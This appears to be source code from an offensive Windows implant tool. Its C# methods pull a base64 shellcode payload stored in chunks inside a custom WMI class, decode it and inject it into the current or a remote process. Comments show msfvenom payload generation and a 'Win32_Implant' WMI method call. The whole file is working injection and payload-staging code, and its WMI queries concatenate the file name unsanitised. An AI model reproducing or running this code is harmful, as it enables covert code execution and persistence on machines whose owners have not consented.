public static void InjectShellCodeWMIFSB64(String processId, String wmiClass, String fileName) { Byte[] peBytes = Misc.QueryWMIFS(wmiClass, fileName); String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes); Int32 dwProcessId = 0; if (String.IsNullOrEmpty(processId)) { using (var injectShellCode = new InjectShellCode(shellCodeString)) { injectShellCode.Execute(); } } else if (Int32.TryParse(processId, out dwProcessId)) { using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId)) { using (var tokens = new Tokens()) { injectShellCodeRemote.Execute(); } } } else { Console.WriteLine("Unknown Error"); } }
public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId) { //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432} ConnectionOptions options = new ConnectionOptions(); options.Impersonation = System.Management.ImpersonationLevel.Impersonate; ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options); scope.Connect(); ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'"); ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount); ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get(); int indexCount = queryIndexCollection.Count; String EncodedText = ""; for (int i = 0; i < indexCount; i++) { ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'"); ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart); ManagementObjectCollection queryCollection = searcherFilePart.Get(); foreach (ManagementObject filePart in queryCollection) { EncodedText += filePart["FileStore"].ToString(); } } byte[] peBytes = System.Convert.FromBase64String(EncodedText); String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes); InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId); return(injectShellCodeRemote.GetOutput()); }
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe public static void InjectShellCode(String strProcessId, String shellCodeString) { Int32 dwProcessId = 0; if (String.IsNullOrEmpty(strProcessId)) { using (var injectShellCode = new InjectShellCode(shellCodeString)) { injectShellCode.Execute(); } } else if (Int32.TryParse(strProcessId, out dwProcessId)) { using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId)) { using (var tokens = new Tokens()) { injectShellCodeRemote.Execute(); } } } else { Console.WriteLine("Unknown Error"); } }
public static string InjectShellCode(string shellCodeString, Int32 processId) { //msfvenom -p windows/x64/exec --format csharp CMD=calc.exe //Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432} InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId); return(injectShellCodeRemote.GetOutput()); }